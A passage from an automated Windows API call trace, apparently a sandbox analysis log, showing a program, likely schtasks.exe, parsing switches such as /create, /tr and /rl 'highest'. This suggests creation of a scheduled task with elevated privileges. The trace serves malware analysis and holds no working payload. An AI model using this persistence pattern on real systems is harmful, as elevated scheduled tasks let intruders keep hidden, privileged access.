(lpFirst="|rp|", lpSrch="|rl|") returned 0x0 [0157.193] SetLastError (dwErrCode=0x490) [0157.193] lstrlenW (lpString="sc") returned 2 [0157.193] lstrlenW (lpString="sc") returned 2 [0157.193] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.193] lstrlenW (lpString="rl") returned 2 [0157.193] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.193] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.193] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.193] lstrlenW (lpString="|sc|") returned 4 [0157.193] lstrlenW (lpString="|rl|") returned 4 [0157.193] StrStrIW (lpFirst="|sc|", lpSrch="|rl|") returned 0x0 [0157.193] SetLastError (dwErrCode=0x490) [0157.193] lstrlenW (lpString="mo") returned 2 [0157.193] lstrlenW (lpString="mo") returned 2 [0157.193] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.193] lstrlenW (lpString="rl") returned 2 [0157.193] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.194] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|mo|") returned 4 [0157.194] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.194] lstrlenW (lpString="|mo|") returned 4 [0157.194] lstrlenW (lpString="|rl|") returned 4 [0157.194] StrStrIW (lpFirst="|mo|", lpSrch="|rl|") returned 0x0 [0157.194] SetLastError (dwErrCode=0x490) [0157.194] lstrlenW (lpString="d") returned 1 [0157.194] lstrlenW (lpString="d") returned 1 [0157.194] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.194] lstrlenW (lpString="rl") returned 2 [0157.194] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.194] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|d|") returned 3 [0157.194] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.194] lstrlenW (lpString="|d|") returned 3 [0157.194] lstrlenW (lpString="|rl|") returned 4 [0157.194] SetLastError (dwErrCode=0x490) [0157.194] lstrlenW (lpString="m") returned 1 [0157.194] lstrlenW (lpString="m") returned 1 [0157.194] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.194] lstrlenW (lpString="rl") returned 2 [0157.194] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.194] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|m|") returned 3 [0157.194] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.194] lstrlenW (lpString="|m|") returned 3 [0157.194] lstrlenW (lpString="|rl|") returned 4 [0157.194] SetLastError (dwErrCode=0x490) [0157.195] lstrlenW (lpString="i") returned 1 [0157.195] lstrlenW (lpString="i") returned 1 [0157.195] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.195] lstrlenW (lpString="rl") returned 2 [0157.195] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.195] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|i|") returned 3 [0157.195] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.195] lstrlenW (lpString="|i|") returned 3 [0157.195] lstrlenW (lpString="|rl|") returned 4 [0157.195] SetLastError (dwErrCode=0x490) [0157.195] lstrlenW (lpString="tn") returned 2 [0157.195] lstrlenW (lpString="tn") returned 2 [0157.195] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.195] lstrlenW (lpString="rl") returned 2 [0157.195] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.195] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.195] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.195] lstrlenW (lpString="|tn|") returned 4 [0157.195] lstrlenW (lpString="|rl|") returned 4 [0157.195] StrStrIW (lpFirst="|tn|", lpSrch="|rl|") returned 0x0 [0157.195] SetLastError (dwErrCode=0x490) [0157.195] lstrlenW (lpString="tr") returned 2 [0157.195] lstrlenW (lpString="tr") returned 2 [0157.195] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.195] lstrlenW (lpString="rl") returned 2 [0157.195] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.196] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.196] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.196] lstrlenW (lpString="|tr|") returned 4 [0157.196] lstrlenW (lpString="|rl|") returned 4 [0157.196] StrStrIW (lpFirst="|tr|", lpSrch="|rl|") returned 0x0 [0157.196] SetLastError (dwErrCode=0x490) [0157.196] lstrlenW (lpString="st") returned 2 [0157.196] lstrlenW (lpString="st") returned 2 [0157.196] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.196] lstrlenW (lpString="rl") returned 2 [0157.196] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.196] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|st|") returned 4 [0157.196] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.196] lstrlenW (lpString="|st|") returned 4 [0157.196] lstrlenW (lpString="|rl|") returned 4 [0157.196] StrStrIW (lpFirst="|st|", lpSrch="|rl|") returned 0x0 [0157.196] SetLastError (dwErrCode=0x490) [0157.196] lstrlenW (lpString="sd") returned 2 [0157.196] lstrlenW (lpString="sd") returned 2 [0157.196] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.196] lstrlenW (lpString="rl") returned 2 [0157.196] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.196] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sd|") returned 4 [0157.196] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.196] lstrlenW (lpString="|sd|") returned 4 [0157.197] lstrlenW (lpString="|rl|") returned 4 [0157.197] StrStrIW (lpFirst="|sd|", lpSrch="|rl|") returned 0x0 [0157.197] SetLastError (dwErrCode=0x490) [0157.197] lstrlenW (lpString="ed") returned 2 [0157.197] lstrlenW (lpString="ed") returned 2 [0157.197] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.215] lstrlenW (lpString="rl") returned 2 [0157.215] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.216] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ed|") returned 4 [0157.216] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.216] lstrlenW (lpString="|ed|") returned 4 [0157.216] lstrlenW (lpString="|rl|") returned 4 [0157.216] StrStrIW (lpFirst="|ed|", lpSrch="|rl|") returned 0x0 [0157.216] SetLastError (dwErrCode=0x490) [0157.216] lstrlenW (lpString="it") returned 2 [0157.216] lstrlenW (lpString="it") returned 2 [0157.216] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.216] lstrlenW (lpString="rl") returned 2 [0157.216] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.216] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|it|") returned 4 [0157.216] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.216] lstrlenW (lpString="|it|") returned 4 [0157.216] lstrlenW (lpString="|rl|") returned 4 [0157.216] StrStrIW (lpFirst="|it|", lpSrch="|rl|") returned 0x0 [0157.216] SetLastError (dwErrCode=0x490) [0157.216] lstrlenW (lpString="et") returned 2 [0157.216] lstrlenW (lpString="et") returned 2 [0157.216] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.216] lstrlenW (lpString="rl") returned 2 [0157.216] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.216] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|et|") returned 4 [0157.216] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.216] lstrlenW (lpString="|et|") returned 4 [0157.216] lstrlenW (lpString="|rl|") returned 4 [0157.216] StrStrIW (lpFirst="|et|", lpSrch="|rl|") returned 0x0 [0157.216] SetLastError (dwErrCode=0x490) [0157.216] lstrlenW (lpString="k") returned 1 [0157.217] lstrlenW (lpString="k") returned 1 [0157.217] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] lstrlenW (lpString="rl") returned 2 [0157.217] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|k|") returned 3 [0157.217] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.217] lstrlenW (lpString="|k|") returned 3 [0157.217] lstrlenW (lpString="|rl|") returned 4 [0157.217] SetLastError (dwErrCode=0x490) [0157.217] lstrlenW (lpString="du") returned 2 [0157.217] lstrlenW (lpString="du") returned 2 [0157.217] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] lstrlenW (lpString="rl") returned 2 [0157.217] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|du|") returned 4 [0157.217] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.217] lstrlenW (lpString="|du|") returned 4 [0157.217] lstrlenW (lpString="|rl|") returned 4 [0157.217] StrStrIW (lpFirst="|du|", lpSrch="|rl|") returned 0x0 [0157.217] SetLastError (dwErrCode=0x490) [0157.217] lstrlenW (lpString="ri") returned 2 [0157.217] lstrlenW (lpString="ri") returned 2 [0157.217] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] lstrlenW (lpString="rl") returned 2 [0157.217] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.217] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ri|") returned 4 [0157.217] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.217] lstrlenW (lpString="|ri|") returned 4 [0157.217] lstrlenW (lpString="|rl|") returned 4 [0157.217] StrStrIW (lpFirst="|ri|", lpSrch="|rl|") returned 0x0 [0157.217] SetLastError (dwErrCode=0x490) [0157.217] lstrlenW (lpString="z") returned 1 [0157.218] lstrlenW (lpString="z") returned 1 [0157.218] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] lstrlenW (lpString="rl") returned 2 [0157.218] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|z|") returned 3 [0157.218] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.218] lstrlenW (lpString="|z|") returned 3 [0157.218] lstrlenW (lpString="|rl|") returned 4 [0157.218] SetLastError (dwErrCode=0x490) [0157.218] lstrlenW (lpString="f") returned 1 [0157.218] lstrlenW (lpString="f") returned 1 [0157.218] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] lstrlenW (lpString="rl") returned 2 [0157.218] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|f|") returned 3 [0157.218] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.218] lstrlenW (lpString="|f|") returned 3 [0157.218] lstrlenW (lpString="|rl|") returned 4 [0157.218] SetLastError (dwErrCode=0x490) [0157.218] lstrlenW (lpString="v1") returned 2 [0157.218] lstrlenW (lpString="v1") returned 2 [0157.218] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] lstrlenW (lpString="rl") returned 2 [0157.218] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.218] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|v1|") returned 4 [0157.218] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.218] lstrlenW (lpString="|v1|") returned 4 [0157.218] lstrlenW (lpString="|rl|") returned 4 [0157.218] StrStrIW (lpFirst="|v1|", lpSrch="|rl|") returned 0x0 [0157.218] SetLastError (dwErrCode=0x490) [0157.218] lstrlenW (lpString="xml") returned 3 [0157.218] lstrlenW (lpString="xml") returned 3 [0157.219] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] lstrlenW (lpString="rl") returned 2 [0157.219] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|xml|") returned 5 [0157.219] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.219] lstrlenW (lpString="|xml|") returned 5 [0157.219] lstrlenW (lpString="|rl|") returned 4 [0157.219] StrStrIW (lpFirst="|xml|", lpSrch="|rl|") returned 0x0 [0157.219] SetLastError (dwErrCode=0x490) [0157.219] lstrlenW (lpString="ec") returned 2 [0157.219] lstrlenW (lpString="ec") returned 2 [0157.219] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] lstrlenW (lpString="rl") returned 2 [0157.219] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ec|") returned 4 [0157.219] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.219] lstrlenW (lpString="|ec|") returned 4 [0157.219] lstrlenW (lpString="|rl|") returned 4 [0157.219] StrStrIW (lpFirst="|ec|", lpSrch="|rl|") returned 0x0 [0157.219] SetLastError (dwErrCode=0x490) [0157.219] lstrlenW (lpString="rl") returned 2 [0157.219] lstrlenW (lpString="rl") returned 2 [0157.219] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] lstrlenW (lpString="rl") returned 2 [0157.219] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.219] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.219] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rl|") returned 4 [0157.219] lstrlenW (lpString="|rl|") returned 4 [0157.219] lstrlenW (lpString="|rl|") returned 4 [0157.219] StrStrIW (lpFirst="|rl|", lpSrch="|rl|") returned="|rl|" [0157.219] SetLastError (dwErrCode=0x0) [0157.220] SetLastError (dwErrCode=0x0) [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] lstrlenW (lpString="-/") returned 2 [0157.220] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0157.220] SetLastError (dwErrCode=0x490) [0157.220] SetLastError (dwErrCode=0x490) [0157.220] SetLastError (dwErrCode=0x0) [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0157.220] SetLastError (dwErrCode=0x490) [0157.220] SetLastError (dwErrCode=0x0) [0157.220] _memicmp (_Buf1=0x4c4d28, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] lstrlenW (lpString=" \x09") returned 2 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0157.220] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0157.220] GetLastError () returned 0x0 [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] lstrlenW (lpString="highest") returned 7 [0157.220] SetLastError (dwErrCode=0x0) [0157.220] SetLastError (dwErrCode=0x0) [0157.220] lstrlenW (lpString="/tr") returned 3 [0157.220] lstrlenW (lpString="-/") returned 2 [0157.220] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0157.220] lstrlenW (lpString="create") returned 6 [0157.220] lstrlenW (lpString="create") returned 6 [0157.220] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.220] lstrlenW (lpString="tr") returned 2 [0157.220] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.220] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|create|") returned 8 [0157.220] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.221] lstrlenW (lpString="|create|") returned 8 [0157.221] lstrlenW (lpString="|tr|") returned 4 [0157.221] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0157.221] SetLastError (dwErrCode=0x490) [0157.221] lstrlenW (lpString="?") returned 1 [0157.221] lstrlenW (lpString="?") returned 1 [0157.221] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] lstrlenW (lpString="tr") returned 2 [0157.221] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|?|") returned 3 [0157.221] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.221] lstrlenW (lpString="|?|") returned 3 [0157.221] lstrlenW (lpString="|tr|") returned 4 [0157.221] SetLastError (dwErrCode=0x490) [0157.221] lstrlenW (lpString="s") returned 1 [0157.221] lstrlenW (lpString="s") returned 1 [0157.221] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] lstrlenW (lpString="tr") returned 2 [0157.221] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|s|") returned 3 [0157.221] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.221] lstrlenW (lpString="|s|") returned 3 [0157.221] lstrlenW (lpString="|tr|") returned 4 [0157.221] SetLastError (dwErrCode=0x490) [0157.221] lstrlenW (lpString="u") returned 1 [0157.221] lstrlenW (lpString="u") returned 1 [0157.221] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] lstrlenW (lpString="tr") returned 2 [0157.221] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.221] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|u|") returned 3 [0157.221] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.221] lstrlenW (lpString="|u|") returned 3 [0157.221] lstrlenW (lpString="|tr|") returned 4 [0157.221] SetLastError (dwErrCode=0x490) [0157.221] lstrlenW (lpString="p") returned 1 [0157.221] lstrlenW (lpString="p") returned 1 [0157.222] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] lstrlenW (lpString="tr") returned 2 [0157.222] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|p|") returned 3 [0157.222] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.222] lstrlenW (lpString="|p|") returned 3 [0157.222] lstrlenW (lpString="|tr|") returned 4 [0157.222] SetLastError (dwErrCode=0x490) [0157.222] lstrlenW (lpString="ru") returned 2 [0157.222] lstrlenW (lpString="ru") returned 2 [0157.222] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] lstrlenW (lpString="tr") returned 2 [0157.222] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|ru|") returned 4 [0157.222] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.222] lstrlenW (lpString="|ru|") returned 4 [0157.222] lstrlenW (lpString="|tr|") returned 4 [0157.222] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0157.222] SetLastError (dwErrCode=0x490) [0157.222] lstrlenW (lpString="rp") returned 2 [0157.222] lstrlenW (lpString="rp") returned 2 [0157.222] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] lstrlenW (lpString="tr") returned 2 [0157.222] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|rp|") returned 4 [0157.222] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.222] lstrlenW (lpString="|rp|") returned 4 [0157.222] lstrlenW (lpString="|tr|") returned 4 [0157.222] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0157.222] SetLastError (dwErrCode=0x490) [0157.222] lstrlenW (lpString="sc") returned 2 [0157.222] lstrlenW (lpString="sc") returned 2 [0157.222] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.222] lstrlenW (lpString="tr") returned 2 [0157.223] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|sc|") returned 4 [0157.223] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.223] lstrlenW (lpString="|sc|") returned 4 [0157.223] lstrlenW (lpString="|tr|") returned 4 [0157.223] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0157.223] SetLastError (dwErrCode=0x490) [0157.223] lstrlenW (lpString="mo") returned 2 [0157.223] lstrlenW (lpString="mo") returned 2 [0157.223] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] lstrlenW (lpString="tr") returned 2 [0157.223] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|mo|") returned 4 [0157.223] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.223] lstrlenW (lpString="|mo|") returned 4 [0157.223] lstrlenW (lpString="|tr|") returned 4 [0157.223] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0157.223] SetLastError (dwErrCode=0x490) [0157.223] lstrlenW (lpString="d") returned 1 [0157.223] lstrlenW (lpString="d") returned 1 [0157.223] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] lstrlenW (lpString="tr") returned 2 [0157.223] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|d|") returned 3 [0157.223] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.223] lstrlenW (lpString="|d|") returned 3 [0157.223] lstrlenW (lpString="|tr|") returned 4 [0157.223] SetLastError (dwErrCode=0x490) [0157.223] lstrlenW (lpString="m") returned 1 [0157.223] lstrlenW (lpString="m") returned 1 [0157.223] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.223] lstrlenW (lpString="tr") returned 2 [0157.223] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] _vsnwprintf (in: 